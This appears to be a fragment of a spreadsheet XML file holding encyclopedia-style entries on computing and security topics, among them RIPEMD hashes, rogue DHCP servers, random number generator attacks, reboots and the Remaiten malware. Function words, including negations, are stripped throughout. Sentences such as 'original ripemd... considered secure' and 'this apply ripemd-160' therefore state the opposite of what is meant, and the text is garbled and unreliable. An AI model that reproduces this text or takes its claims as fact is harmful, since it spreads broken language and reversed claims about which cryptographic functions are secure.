    <t>ripemd (ripe message digest) family cryptographic hash functions developed 1992 (the original ripemd) 1996 (other variants). there five functions family: ripemd, ripemd-128, ripemd-160, ripemd-256, ripemd-320, ripemd-160 common. original ripemd, well ripemd-128, considered secure 128-bit result small also (for original ripemd) design weaknesses. 256- 320-bit versions ripemd provide level security ripemd-128 ripemd-160, respectively; designed applications security level sufficient longer hash result necessary. while ripemd functions less popular sha-1 sha-2, used, among others, bitcoin cryptocurrencies based bitcoin. history original ripemd function designed framework project ripe (race integrity primitives evaluation) 1992. design based hash function. 1996, response security weaknesses found original ripemd, hans dobbertin, antoon bosselaers bart preneel cosic research group katholieke universiteit leuven leuven, belgium published four strengthened variants: ripemd-128, ripemd-160, ripemd-256, ripemd-320.in august 2004, collision reported original ripemd. this apply ripemd-160. ripemd-160 hashes 160-bit ripemd-160 hashes (also termed ripe message digests) typically represented 40-digit hexadecimal numbers. following demonstrates 43-byte ascii input corresponding ripemd-160 hash: ripemd-160("the quick brown jumps lazy dog") 37f332f68db77bd9d7edd4969571ad671cf9dd3b ripemd-160 behaves desired avalanche effect cryptographic hash functions (small changes, e.g. changing result completely different hash): ripemd-160("the quick brown jumps lazy cog") 132072df690933835eb8b6ad0b77e7b6f14acad7 hash zero-length string ripemd-160("") 9c1185a5c5e9fc54612808977ee8f548b2258d31 implementations below list cryptography libraries support ripemd (specifically ripemd-160): botan bouncy castle cryptlib crypto++ libgcrypt mbed nettle openssl wolfssl also hash function security summary comparison cryptographic hash functions comparison cryptography libraries topics cryptography references external links hash function ripemd-160 ripemd-160 ecrypt page ripemd-128bit algorithm</t>
  </si>
  <si>
    <t>Rogue DHCP</t>
  </si>
  <si>
    <t>rogue dhcp server dhcp server network administrative control network staff. network device modem router connected network user either unaware consequences actions knowingly using network attacks middle. some kind computer viruses malicious software found rogue dhcp, especially classified category. clients connect network, rogue legal dhcp server offer addresses well default gateway, servers, wins servers, among others. information provided rogue dhcp differs real one, clients accepting addresses experience network access problems, including speed issues well inability reach hosts incorrect network gateway. addition, rogue dhcp provide default gateway address machine controlled misbehaving user, sniff traffic sent clients networks, violating network security policies well user privacy (see middle). vmware virtual machine software also rogue dhcp server inadvertently client machine joined network. vmware rogue dhcp server handing random addresses clients around network. result large portions network internet rest domain without access all. mitigation rogue dhcp servers stopped means intrusion detection systems appropriate signatures, well multilayer switches, configured drop packets. common methods deal rogue dhcp servers called dhcp snooping, drops dhcp messages untrusted dhcp servers. external links rogue dhcp servers detected using software: microsoft network monitor (windows vista, server 2003, server 2008) dhcp_probe (unix) softperfect network scanner (win32 freeware, supports windows 2000, 2003, vista, 2008, seven) dhcploc.exe (win32) windows support tools (windows server 2003) dhcp sentry (win32) dhcp sentry tool rogue detect (perl) open dhcp locate (unix, win32, c)manual examination perusing scapy package python: scapy (python) references</t>
  </si>
  <si>
    <t>Miredo</t>
  </si>
  <si>
    <t>miredo teredo tunneling client designed allow full ipv6 connectivity computer systems ipv4-based internet direct native connection ipv6 network. miredo included many linux distributions also available recent versions (discontinued) includes working implementations teredo client teredo relay teredo serverreleased terms general public license, miredo free software. also references external links official website</t>
  </si>
  <si>
    <t>Mirror site</t>
  </si>
  <si>
    <t>mirror sites mirrors replicas websites network node. concept mirroring applies network services accessible protocol, http ftp. such sites different urls original site, host identical near-identical content. mirror sites often located different geographic region original, upstream site. purpose mirrors reduce network traffic, improve access speed, ensure availability original site technical political reasons, provide real-time backup original site. mirror sites particularly important developing countries, internet access slower less reliable. maintainers mirrors choose replicate entire contents upstream server mirroring technical constraints, selecting subset relevant purpose, software written particular programming language, runnable single computer platform, written author. these sites called partial mirrors secondary mirrors.mirror sites heavily used early internet, users accessed dialup internet backbone much lower bandwidth today, making geographically-localized mirror network worthwhile benefit. download archives info-mac, tucows cpan maintained worldwide networks mirroring content accessible http anonymous ftp. some networks, info-mac tucows longer active removed mirrored download sections, like cpan debian package mirrors still active 2019. debian removed access mirrors 2017 declining relative stagnation protocol, mentioning servers' lack support techniques caching load balancing available http. mirrors https support ipv6 along ipv4. primary mirror sites distribute secondary mirrors using rsync ensure integrity files file consistency master mirror. examples notable websites mirrors include project gutenberg, kickasstorrents, pirate bay, wikileaks, website environmental protection agency, wikipedia. some notable partial mirrors include free open-source software projects gnu, particular linux distributions centos, debian, fedora, ubuntu; projects provide mirrors download sites (since expected high server load). many open source application providers videolan mirrors distribute media player, document foundation uses mirrors distribute libreoffice.it common tech companies microsoft, hewlet-packard apple maintain network mirrors accessible http anonymous ftp, hosting software updates, sample code various freely-downloadable utilities. much sites shut first decades 21st century, apple shutting services 2012 microsoft stopping updates 2010. today, contents number mirror sites archived site boneyard free software free download, borrow streaming internet archive. occasionally, people scraping software produce static dumps existing sites, bbc's gear redflagdeals. also references external links</t>
  </si>
  <si>
    <t>Optical disc image</t>
  </si>
  <si>
    <t>optical disc image image, 9660 file system used cd-rom media) disk image contains everything would written optical disc, disk sector disc sector, including optical disc file system. images expected contain binary image optical media file system (usually 9660 extensions udf), including data files binary format, copied exactly stored disc. data inside image structured according file system used optical disc created. images created optical discs disk imaging software, collection files optical disc authoring software, different disk image file means conversion. software distributed bootable discs often available download image format. like image, written optical disc blu-ray. description optical disc images uncompressed particular container format; sector-by-sector copy data optical disc, stored inside binary file. other 9660 media, image might also contain (iso/iec 13346) file system (commonly used dvds blu-ray discs), including data files binary format, copied exactly stored disc. data inside image structured according file system used optical disc created. .iso file extension commonly used type disc images. .img extension also found image files, images microsoft dreamspark; however, files, also .img extension, tend slightly different contents. .udf file extension sometimes used indicate file system inside image actually 9660. files store user data sector optical disc ignoring control headers error correction data, therefore slightly smaller disc image optical media. since size user data portion sector (logical sector) data optical discs 2,048 bytes, size image multiple 2,048. single-track cd-rom, blu-ray disc archived format true digital copy original. unlike physical optical disc, image transferred data link removable storage medium. image opened almost every multi-format file archiver. native support handling images varies operating system operating system. "mounted" suitable driver software, i.e. treated operating system physical optical disc. most unix-based operating systems, including linux macos, built-in capability mount iso. versions windows beginning windows also capability. operating systems software drivers installed achieve objective. multiple-track images multiple tracks, contain computer data, audio, video. file systems 9660 stored inside tracks. since images expected contain binary copy file system contents, concept "track" inside image, since track container contents image. this means multiple tracks can't stored inside single image; most, image contain data inside multiple tracks, stored inside standard file system. this also means audio cds, usually composed multiple tracks, can't stored inside image. furthermore, even single track audio stored image, since audio tracks contain file system inside them, continuous stream encoded audio data. this audio stored sectors 2352 bytes different store file system stored inside files; addressed track numbers, index points time code encoded lead-in session cd-audio disc. video super video require least tracks also possible store image discs inside image file, however .img file achieve this. formats cue/bin, ccd/img mds/mdf formats used store multi-track disc images, including audio cds. these formats store disc image complete disc, including information tracks, along companion file describing multiple tracks characteristics tracks. this would allow optical media burning tool information required correctly burn image disc. audio cds, also transfer audio data uncompressed audio files like aiff, optionally reserving metadata (see ripping). most software capable writing images hard disks recordable media generally able write disk images flash drives. this limitation related availability software tools able perform task, problems format itself. however, since 2011, various software existed write image files flash drives. uses .iso files commonly used emulators replicate image. emulators dolphin pcsx2 .iso files emulate gamecube games, playstation games, respectively. they also used virtual cd-roms hypervisors vmware workstation virtualbox. other uses burning disk images operating systems physical install media. also comparison disc image software live no-disc crack references external links write files dvd, linux using genisoimage, wodim, growisofs, etc.</t>
  </si>
  <si>
    <t>Random number generator attack</t>
  </si>
  <si>
    <t>security cryptographic systems depends secret data known authorized persons unknown unpredictable others. achieve unpredictability, randomization typically employed. modern cryptographic protocols often require frequent generation random quantities. cryptographic attacks subvert exploit weaknesses process known random number generator attacks. high quality random number generation (rng) process almost always required security, lack quality generally provides attack vulnerabilities leads lack security, even complete compromise, cryptographic systems. process particularly attractive attackers typically single isolated hardware software component easy locate. attacker substitute pseudo-random bits generated predict, security totally compromised, generally undetectable upstream test bits. furthermore, attacks require single access system compromised. data need sent back contrast say, computer virus steals keys e-mails drop point. human generation random quantities humans generally poorly generating random quantities. magicians, professional gamblers artists depend predictability human behavior. world german code clerks instructed select three letters random initial rotor setting enigma machine message. instead chose predictable values like girlfriend's initials, greatly aiding allied breaking encryption systems. another example often predictable ways computer users choose passwords (see password cracking). nevertheless, specific case playing mixed strategy games, human gameplay entropy randomness generation studied halprin moni naor. attacks software rngs just components cryptosystem, software random number generator designed resist certain attacks. some attacks possible include (from): direct cryptanalytic attack attacker obtained part stream random bits distinguish output truly random stream. input-based attacks modify input attack example "flushing" existing entropy system known state. state compromise extension attacks internal secret state known time, predict future output recover previous outputs. this happen generator starts little entropy (especially computer booted followed standard sequence operations), attacker able obtain initial guess state. hardware rngs number attacks hardware random number generators possible, including trying capture radio-frequency emissions computer (obtaining hard drive interrupt times motor noise, example), trying feed controlled signals supposedly random source (such turning lights lava lamp feeding strong, known signal sound card). subversion subverted random numbers created using cryptographically secure pseudorandom number generator seed value known attacker concealed software. relatively short, bit, portion seed truly random prevent tell-tale repetitions, long enough prevent attacker recovering, say, "randomly" produced key. random numbers typically several layers hardware software used. bits generated peripheral device, sent serial cable, collected operating system utility retrieved system call. subverted bits substituted point process little likelihood detection. hardware circuit produce subverted bits built integrated circuit millimeters square. sophisticated hardware random number generator subverted placing chip anywhere upstream source randomness digitized, output driver chip even cable connecting computer. subversion chip include clock limit start operation time unit first turned acceptance tests, contain radio receiver on/off control. could installed manufacturer behest national signals intelligence service, added later anyone physical access. chips built-in hardware random number generators replaced compatible chips subverted chips' firmware. defenses (with, example, xor) hardware generated random numbers output good quality stream cipher, close point possible. stream cipher seed changeable audited derived trustworthy source, e.g. dice throws. fortuna random number generator example algorithm uses mechanism. generate passwords passphrases using true random source. some systems select random passwords user rather users propose own. encryption systems document generate random numbers provide method audit generation process. build security systems shelf hardware, preferably purchased ways reveal intended use, e.g. floor large retail establishment. from perspective, sound cards webcams better source randomness hardware made purpose. maintain complete physical control hardware purchased.designing secure random number generator requires least high level care designing elements cryptographic system. prominent examples predictable netscape seed early versions netscape's secure sockets layer (ssl) encryption protocol used pseudo-random quantities derived prng seeded three variable values: time day, process parent process these quantities often relatively predictable, little entropy less random, version found insecure result. problem reported netscape 1994 phillip hallam-baker, researcher cern team, fixed prior release. problem running code discovered 1995 goldberg david wagner, reverse engineer object code netscape refused reveal details random number generation (security obscurity). that fixed later releases (version higher) robust (i.e., random higher entropy attacker's perspective) seeding. microsoft windows 2000/xp random number generator microsoft uses unpublished algorithm generate random values windows operating system. these random quantities made available users cryptgenrandom utility. november 2007, dorrendorf hebrew university jerusalem university haifa published paper titled cryptanalysis random number generator windows operating system. paper presented serious weaknesses microsoft's approach time. paper's conclusions based disassembly code windows 2000, according microsoft applied windows well. microsoft stated problems described paper addressed subsequent releases windows, different implementation. possible backdoor elliptic curve drbg u.s. national institute standards technology published collection "deterministic random generators" recommends nist special publication 800-90. generators, dual_ec_drbg, favored national security agency. dual_ec_drbg uses elliptic curve technology includes recommended constants. august 2007, shumow niels ferguson microsoft showed constants could constructed create kleptographic backdoor algorithm. september 2013 york times wrote "the n.s.a. inserted back door 2006 standard adopted n.i.s.t... called dual drbg standard", thereby revealing carried malware attack american people. december 2013, reuters reported documents released edward snowden indicated paid security million make dual_ec_drbg default encryption software, raised concerns algorithm might contain backdoor nsa. concerns, 2014, nist withdrew dual drbg draft guidance random number generators, recommending "current users dual_ec_drbg transition three remaining approved algorithms quickly possible." mifare crypto-1 crypto-1 cryptosystem developed mifare chips. system proprietary originally algorithm published. upon reverse engineering chip, researchers university virginia chaos computer club found attack crypto-1 exploiting poorly initialized random number generator. debian openssl 2008, security researcher luciano bello revealed discovery changes made 2006 random number generator version openssl package distributed debian linux debian-based distributions, ubuntu, dramatically reduced entropy generated values made variety security keys vulnerable attack. security weakness caused changes made openssl code debian developer response compiler warnings apparently redundant code. this caused massive worldwide regeneration keys, despite attention issue got, could assumed many keys still use. types affected include keys, openvpn keys, dnssec keys, material x.509 certificates session keys used ssl/tls connections. keys generated gnupg gnutls affected programs used different methods generate random numbers. keys generated non-debian-based linux distributions also unaffected. weak-key-generation vulnerability promptly patched reported, services still using keys generated code remain vulnerable. number software packages contain checks weak blacklist attempt prevent remaining weak keys, researchers continue find weak implementations. playstation december 2010, group calling fail0verflow announced recovery elliptic curve digital signature algorithm (ecdsa) private used sony sign software playstation game console. attack made possible sony failed generate random nonce signature. public factoring analysis comparing millions public keys gathered internet announced 2012 lenstra, hughes, augier, bos, kleinjung, wachter. they able factor 0.2% keys using euclid's algorithm. they exploited weakness unique cryptosystems based integer factorization. public p′q′ another, chance simple computation gcd(n,n′) factors totally compromising keys. nadia heninger, part group similar experiment, said keys occurred almost entirely embedded applications, explains one-shared-prime problem uncovered groups results situations pseudorandom number generator poorly seeded initially reseeded generation first second primes. java nonce collision august 2013, revealed bugs java class securerandom could generate collisions nonce values used ecdsa implementations bitcoin android. when occurred private could recovered, turn allowing stealing bitcoins containing wallet. also pseudorandom number generator cryptographically secure pseudorandom number generator generation one-time salt nonce references further reading gutterman, zvi; benny pinkas; tzachy reinman (2006). "analysis linux random number generator" (pdf). 2006 ieee symposium security privacy (s&amp;p'06). 385. doi:10.1109/sp.2006.5. isbn 978-0-7695-2574-7. s2cid 6385808. eastlake, schiller; crocker (june 2005). "randomness requirements security". rfc. ietf.</t>
  </si>
  <si>
    <t>NIST hash function competition</t>
  </si>
  <si>
    <t>nist hash function competition open competition held national institute standards technology (nist) develop hash function called sha-3 complement older sha-1 sha-2. competition formally announced federal register november 2007. "nist initiating effort develop additional hash algorithms public competition, similar development process advanced encryption standard (aes)." competition ended october 2012 nist announced keccak would sha-3 hash algorithm.the winning hash function published nist fips "sha-3 standard", complement fips 180-4, secure hash standard. nist competition inspired competitions password hashing competition. process submissions october 2008 list candidates accepted first round published december 2008. nist held conference late february 2009 submitters presented algorithms nist officials discussed criteria narrowing field candidates round list candidates accepted round published july 2009. another conference held august 23–24, 2010 (after crypto 2010) university california, santa barbara, second-round candidates discussed. announcement final round candidates occurred december 2010. october 2012, nist announced winner, choosing keccak, created guido bertoni, joan daemen, gilles assche stmicroelectronics michaël peeters nxp. entrants this incomplete list known submissions. nist selected entries round advanced round finalists selected. winner winner announced keccak october 2012. finalists nist selected five sha-3 candidate algorithms advance third (and final) round: blake (aumasson al.) grøstl (knudsen al.) (hongjun keccak (keccak team, daemen al.) skein (schneier al.)nist noted factors figured selection announced finalists: performance: couple algorithms wounded eliminated large [hardware gate] area requirement seemed area required precluded much potential application space." security: preferred conservative security, cases select algorithms exceptional performance, largely something made 'nervous,' even though knew clear attack full algorithm." analysis: "nist eliminated several algorithms extent second-round tweaks relative lack reported cryptanalysis either tended create suspicion design might fully tested mature." diversity: finalists included hashes based different modes operation, including haifa sponge function constructions, different internal structures, including ones based aes, bitslicing, alternating addition.nist released report explaining evaluation algorithm-by-algorithm. pass final round following hash function submissions accepted round two, make final round. noted announcement finalists, "none candidates clearly broken". pass round following hash function submissions accepted round pass round two. they neither conceded submitters substantial cryptographic weaknesses. however, weaknesses design components, performance issues. entrants substantial weaknesses following non-conceded round entrants substantial cryptographic weaknesses announced: conceded entrants following round entrants officially retracted competition submitters; considered broken according nist official round candidates site. such, withdrawn competition. rejected entrants several submissions received nist accepted first round candidates, following internal review nist. general, nist gave details rejected. nist also given comprehensive list rejected algorithms; known following public. also advanced encryption standard process caesar competition competition design authenticated encryption schemes post-quantum cryptography standardization references external links nist website competition official list second round candidates official list first round candidates sha-3 classification sha-3 candidates hash function lounge vhdl source code developed cryptographic engineering research group (cerg) george mason university fips sha-3 standard</t>
  </si>
  <si>
    <t>Retrospect (software)</t>
  </si>
  <si>
    <t>retrospect family software applications back computers running macos, microsoft windows, linux (and 2019 classic operating systems. uses client–server backup model.the product focused small medium enterprise (sme) market. performs three types backup: recycle backup deletes backup adds files, media backup creates backup set, copying files included. again represents files. once installed, scripts also introduced enable scheduled backup using predetermined information supplied administrator. this information contains source, destination criteria, enables backup session scan back volume time, requiring less memory immediate backup."the product used gui-scripted backup. history software first developed dantz development corporation 1989, initially macintosh platform continuing later windows. with sales split evenly variants macintosh variant claiming market, dantz development corporation acquired corporation 2004. 2006 version 7.5, refined first release windows variant emc, added performance features needed smes.acquisition emc, insignia brand, product briefly mothballed insignia shut 2007. revived 2008 transferred emc's acquisition iomega. "premature" release retrospect 2009 undermined market apple introduced competing time machine late 2007. 2010, retrospect sold roxio, owned sonic solutions, turn acquired rovi. rovi decided core business, team worked product approached rovi idea spinning separate company. retrospect, inc. formed core team worked product years more. retrospect introduced 2012, positive reviews.in june 2019 holding company storcentric—which also owns drobo—announced acquired retrospect inc., operate wholly owned independent subsidiary. also apple tape backup 40sc references external links official website</t>
  </si>
  <si>
    <t>Novell BorderManager</t>
  </si>
  <si>
    <t>bordermanager multi purpose network security application developed novell, inc. bordermanager designed proxy server, firewall, access point. novell announced migration superlumin proxy cache "novell's preferred firewall proxy solution netware customers upgrading novell open enterprise server linux." history bordermanager designed netware kernel takes advantage fast file services netware kernel delivers. aside easily copied firewall access point services, novell designed proxy services retrieve data server server connection rather client server connection prior proxy servers market done. this retrieval method along netware's fast file proprietary code made bordermanager's proxy engine fastest existence.in 2003, novell announced successor product netware: open enterprise server (oes). first released march 2005, completes separation services traditionally associated netware, i.e. file print. this makes possible customer choose netware linux kernel services time novell announced development netware kernel (numerous public private statements 64-bit future netware linux path 64-bit computing oes). follow migration path, novell began porting applications linux. company began looking alternate ways deliver services, firewall access point services equivalent functionality readily available free/open-source community also basic proxy services well (i.e. squid). desire deliver functional equivalent could done full software code port much cache engine sold part volera excelerator novell holds great desire create open-source software basic services this. novell entered agreement astaro relabel astaro security gateway license novell security manager. product removed novell price list february 2007. future late summer 2006 novell announced, would bordermanager release.at novell brainshare conference 2010, novell announced "superlumin proxy cache path forward bordermanager customers." they also announced "extended bordermanager general support years (through march 2012)" give customers "adequate time make move." november 2011, novell support lifecycle page states "border manager general support extended september 2013, make easy customers plan execute upgrade novell open enterprise server. upgrade path border manager remains superlumin nemesis." third-party filtering solutions third-party filtering solutions available novell bordermanager, following companies: connectotel linkwall suite contentfilter secure computing n2h2/bess surfcontrol references further reading pan, laura (1999). novell's bordermanager administrator's handbook. novell press. isbn 978-0-7645-4565-8. gaskin, james (1997). intranetware bordermanager. sybex inc. isbn 978-0-7821-2138-4. johnson, craig (2011). migrating bordermanager superlumin nemesis. book website external links novell bordermanager home page bordermanager cool solutions tips tricks, guides, tools resources submitted bordermanager community novell connection article bordermanager craig johnson consulting bordermanager netware hints, tips, files novell security manager home page novell access manager home page</t>
  </si>
  <si>
    <t>Reboot to restore software</t>
  </si>
  <si>
    <t>reboot restore system restore technology enables restoring user-defined system configuration computing device every restart. technology helps maintain systems optimum working conditions useful especially multi-user computing environments.deploying solutions based reboot restore technology enables users define particular system configuration desired state. baseline point restored reboot. once baseline set, reboot restore software continues restore configuration every time device restarts switches shutdown. works reboot restore software helps maintaining optimal system configuration, quite effective multi-user computing environment. technology prevents many alterations baseline configuration, whether user inflicted automatic. alterations users primarily changes system settings, installing uninstalling software applications, enabling disabling specific functionalities, automatic alterations include cookies, add-ons browser extensions, several types temporary files often downloaded background online session. also rolls back malicious alterations made malware elusively penetrates system attempts corrupt uses reboot restore software solutions simplifies maintaining optimal system configuration devices multi-user computing environment public libraries, computer labs educational institutes (such k-12, colleges, universities) training centers, public access kiosks, because constant multiple people wide range purposes, devices become susceptible performance deterioration malware infiltration.during events system malfunction failure, takes considerably longer time troubleshoot issue using conventional practices like resetting re-imaging. this lead prolonged downtime, causing poor user experience, potential loss business opportunity, higher maintenance costs.restore reboot functionality maintains best system configuration (pristine state) every public-access computer without long-drawn troubleshooting steps. instant restoration technology empowers end-users resolve system issues simply restarting device, significantly reduces intervention technology restores pristine configuration every reboot, user’s system achieves optimum performance. technology helps deliver maximum system uptime, improves operational efficiency resource utilization.system administrators corporates deploy reboots restore solutions create prestige environments constant troubleshooting. they software protect system drive allocate separate data partition, store redirect user application data. software built reboot restore technology windows steadystate initially named shared computer toolkit windows steadystate freeware reboot restore solution offered microsoft compatible windows windows vista operating systems. microsoft discontinued windows steadystate december 2010. people educational institutes public libraries primarily software. steadystate features windows disk protection (wdp) functionality. when enabled, redirects user-generated changes cache. software three modes—discard, persist, commit. discard mode clears cache reboot restores original configuration. persist mode retains cache specific time, admins could discard commit changes. commit mode, changes permanently written hard disk usual. deep freeze deep freeze faronics first rollback software solutions leverage reboot restore technology, releasing first windows solution 1999, followed solution 2005. deep freeze uses patented technology patent 7539828 patent 7917717 patent 9152824 patent 9785370 redirects information written hard drive partition allocation table, leaving original data intact. redirected information allocation table longer referenced computer restarted, therefore restoring computer back original state disk sector level last byte.extending functionalities reboot restore technology, software provision thawspaces thawed partitions permanently saving user-generated data without altering baseline configuration. thawspace virtual space system administrators create within deep freeze ecosystem hard disk partition. content stored thawspace retained across reboots. thawed partitions parts hard disk exempted effects reboot restore technology. other system restoration software both microsoft apple inc. offer restoration tools (though based reboot restore technology) embedded respective operating systems. windows system restore system restore inbuilt feature windows available latest versions reverts system files settings previous point time without affecting personal files. when enabled, software automatically creates restore points regular intervals every major instance configuration alteration like driver update application installation. when device malfunctions, running system restore rolls back configuration restore point particular issue exist. reset (windows reset option introduced windows used restoring systems factory defaults. re-installs windows permanently discards files system settings pre-installed applications. time machine time machine (macos) functions backup utility restoration program. creates incremental snapshots system configuration periodically requires external storage device backing macos. this backup later used restore previous configuration required. software also used restore specific items like deleted emails older versions files rather entire configuration. refresh also introduced windows refresh re-installs windows retains user files, pre-installed applications, installed users. running reset option advised refresh fails resolve issue. references</t>
  </si>
  <si>
    <t>Notemaker</t>
  </si>
  <si>
    <t>notemakers type software tool first produced commodore they designed allow author write multiple-page note saved compact self-executing program. when program executed, note displays itself, usually music visual effects, allowing pagination. tour future achieved fame developing first "viral" notemaker: note reader incorporated writer, notes could written, saved distributed, typically, notes would release notes accompanying software, personal public messages friends within scene. group, successor tera, produced several notemakers, strategy increase visibility across scene. concept caught many notemakers soon developed. notemakers later popular apple macintosh series computers docviewer competing products. references external links tour future 'notemaker v1.0' csdb</t>
  </si>
  <si>
    <t>Reboot</t>
  </si>
  <si>
    <t>computing, rebooting process running computer system restarted, either intentionally unintentionally. reboots either cold reboot (alternatively known hard reboot) power system physically turned back (causing initial boot machine); warm reboot soft reboot) system restarts still powered term restart system command) used refer reboot operating system closes programs finalizes pending input output operations initiating soft reboot. terminology etymology early electronic computers (like 1401) operating system little internal memory. input often stack punch cards switch register. systems cards, computer initiated pressing start button performed single command "read card". this first card instructed machine read cards eventually loaded user program. this process likened saying, "picking bootstraps", referring horseman lifts ground pulling straps boots. this initiating punch cards called "bootstrap cards". thus cold start called booting computer computer crashed, rebooted. boot reference carried subsequent types computers. cold versus warm reboot technical sources describe contrasting forms reboot known cold reboot (also cold boot, hard reboot hard boot) warm reboot (also soft reboot, soft boot), although definition forms vary slightly sources. according jones, landes, tittel (2002), cooper (2002), tulloch (2002) soper (2004), compatible platform, cold boot boot process computer starts powerless state. except tulloch (2002) also mention cold boot, system performs power-on self-test (post). addition power switch, cooper (2002) soper (2004) also state reset button, present, commence cold reboot. jones, landes, tittel (2002) contradicts assertion states reset button commence either cold warm reboot, depending system. microsoft support article 102228 states although reset button designed perform cold reboot, disconnect power motherboard state correspond cold boot definition given above. according jones, landes, tittel (2002),: operating system third-party software initiate cold boot; restart command windows initiates cold reboot, unless shift held. finding definition warm boot, however, challenge. aforementioned sources indicate warm boot initiated pressing ctrl delete combination; except tulloch (2002) mention warm reboot perform post. jones, landes, tittel (2002) specifies warm reboot occur, bios must recipient combination. microsoft support article 102228 takes technical approach defines warm boot result invoking 19h, bios interrupt call, ctrl delete combination achieving this. according grimes (2001), malware prevent subvert warm boot intercepting ctrl delete combination prevent reaching bios. windows family operating systems also reserves combination use. soper (2004) asserts windows "restart" command initiates warm boot, thus contradicting jones, landes, tittel (2002), believe action performs cold boot. linux family operating systems supports alternative warm boot; linux kernel optional support kexec, system call transfers execution kernel skips hardware firmware reset. entire process occurs independently system firmware. kernel executed linux kernel. outside domain compatible pcs, types boot disambiguous. according windows base team, windows devices support three types boots: warm, cold clean. warm boot discards program memory. cold boot additionally discards storage memory (also known "object store"), clean boot erases forms memory storage device. however, since areas exist windows devices, users concerned forms reboot: resets volatile memory wipes device clean restores factory settings. example, windows mobile device, former cold boot latter clean boot. hard reboot hard reboot means system shut orderly manner, skipping file system synchronisation activities would occur orderly shutdown. this achieved either applying reset, cycling power, issuing halt command unix-like systems, triggering kernel panic. restart term "restart" used microsoft windows linux families operating systems denote operating system-assisted reboot. restart, operating system ensures pending operations gracefully ended commencing reboot. causes deliberate users deliberately initiate reboot. rationale action include: troubleshooting: rebooting used users, support staff system administrators technique work around bugs software, example memory leaks processes resources detriment overall system, terminate malware. while approach address root cause issue, resetting system back good, known state allow used period issue next occurs. switching operating systems: multi-boot system without hypervisor, reboot required switch installed operating systems. offensive: stated earlier, components lose power cold reboot; therefore, components require power lose data hold. however, cold boot attack, special configurations allow part system state, like disk, preserved reboot.the means performing deliberate reboot also vary include: manual, hardware-based: power switch reset button cause system reboot. doing however, cause loss unsaved data. manual, software-based: computer software operating system trigger reboot well; specifically, microsoft windows operating systems outfitted restart command closes open programs eliminates data loss reboot.: automated: software scheduled certain time date; therefore, possible schedule reboot. power failure unexpected loss power reason (including power outage, power supply failure depletion battery mobile device) forces system user perform cold boot power restored. some bioses option automatically boot system power failure. uninterruptible power supply (ups), backup battery redundant power supply prevent circumstances. random reboot "random reboot" non-technical term referring unintended (and often undesired) reboot following system crash, whose root cause immediately evident user. such crashes occur multitude software hardware problems, triple faults. they generally symptomatic error ring trapped error handler operating system hardware-triggered non-maskable interrupt. systems configured reboot automatically power failure, fatal system error kernel panic. method done varies depending whether reboot handled software must handled firmware hardware level. operating systems windows family (from windows windows option modify behavior error handler computer immediately restarts rather displaying blue screen death (bsod) error message. this option enabled default editions. hibernation introduction advanced power management allowed operating systems greater control hardware power management features. with advanced configuration power interface (acpi), newer operating systems able manage different power states thereby sleep and/or hibernate. while hibernation also involves turning system subsequently back again, operating system start scratch, thereby differentiating process rebooting. simulated reboot reboot simulated software running operating system. example: sysinternals bluescreen utility, used pranking; modes bsod xscreensaver "hack", entertainment (albeit possibly concerning first glance). malware also simulate reboot, thereby deceive computer user nefarious purpose.microsoft app-v sequencing tool captures file system operations installer order create virtualized software package users. part sequencing process, detect installer requires reboot, interrupt triggered reboot, instead simulate required reboot restarting services loading/unloading libraries. windows deviations labeling criticism windows enable default) hibernation-like "fast startup" (a.k.a. "fast boot") cause problems (including confusion) users accustomed turning computers (cold) reboot them. also booting cold start (computing) local reboot power cycling references</t>
  </si>
  <si>
    <t>Network Based Application Recognition</t>
  </si>
  <si>
    <t>network based application recognition (nbar) mechanism used cisco routers switches recognize dataflow inspecting packets sent. networking equipment uses nbar deep packet inspection packets dataflow, determine traffic category flow belongs used conjunction features, program internal application-specific integrated circuits (asics) handle flow appropriately. categorization done open systems interconnection (osi) layer info, packet content, signaling, applications made difficult purpose cling kind tagging.the nbar approach useful dealing malicious software using known ports fake "priority traffic", well non-standard applications using dynamic ports. that's nbar also known layer categorization. cisco routers, nbar mainly used quality service network security purposes. references external links network based application recognition: payload classification, cisco. block traffic cisco router using nbar configuration example, cisco.</t>
  </si>
  <si>
    <t>Network Extrusion</t>
  </si>
  <si>
    <t>network extrusion kind tunnel subnet host) moved another location, without router advertisement changes. such subnet routed normally, send tunnel appear anywhere else internet. this type connection often used for: adding ipv4 public address space location public address, consumer internet connection assigning static address roaming laptop ensure always reachable static address. this often done ipsec l2tp xauthin ipsec/openswan ipv4 configuration, corresponds policy client system like: conn mylaptop—extruded right=192.1.0.1 rightsubnet=0.0.0.0/0 left=%defaultroute leftsubnet=192.0.0.1/32 leftsourceip=192.0.0.1 when ipsec connection active, default address outgoing connections 192.0.0.1. since covered ipsec tunnel, packet encrypted send remote ipsec gateway 192.1.0.1. decrypted sent original destination. response packets follow similar path reverse. when using leftsubnet=192.0.0.0/24, could even small network laptop default gateway provide public addresses many computers, appearing live remote site. generally, ipsec vpns used many cases route private networks rather public ones, configuration implausible, unusual administrators. many remote access situations network extrusions corporate firewall inspect traffic travels laptop computer. this technique also used tunnel ipv6 space networks ipv4 space available vice versa) these tunnels invisible traceroute ipsec tunnel appears single additional hop, like subnet.</t>
  </si>
  <si>
    <t>Remaiten</t>
  </si>
  <si>
    <t>remaiten malware infects linux embedded systems brute forcing using frequently used default username passwords combinations list order infect system.remaiten combines features tsunami lizardstresser (aka torlus) malware families. command control remaiten handled communications. additionally command control done actual channel rather protocol. this improvement bots tsunami torlus making remaiten greater threat combined.to avoid detection, remaiten tries determine platform device download architecture-appropriate component command control server.once remaiten infects device able perform actions launching distributed denial service attacks download malware device. remaiten able scan remove competing bots system compromised also botnet mirai (malware) bashlite linux.darlloz linux.wifatch hajime (malware) references</t>
  </si>
  <si>
    <t>RecoverPoint</t>
  </si>
  <si>
    <t>recoverpoint continuous data protection product offered dell supports asynchronous synchronous data replication block-based storage. recoverpoint originally created company called kashya, bought 2006. description kashya founded february, 2001, originally located ramat gan, israel. venture funding included battery ventures jerusalem global ventures. 2003, additional operations jose, california announced along million funding first product. kashya acquired corporation 2006 $153 million. already announced product named recoverpoint october 2005, adapted product called recovery mendocino software. kashya product named 5000. recoverpoint product based kashya technology released 2007, version released 2008.recoverpoint continuous data protection (cdp) tracks changes data block level journals changes. every write tracked stored different snapshot. alternatively, groups writes aggregated according configuration order reduce storage space network traffic. journal allows rolling data previous "point-in-time" order view drive contents certain data corruption. journal write individually, hence enabling any-point-in-time snapshots, configured combine consecutive writes order reduce journal space improve bandwidth. works storage area network recoverpoint appliances need configured replica journal logical unit numbers (luns). recoverpoint continuous remote replication (crr) enables replica remote site. setup, recoverpoint appliances clusters required local remote sites. these clusters communicate either fibre channel (fc) 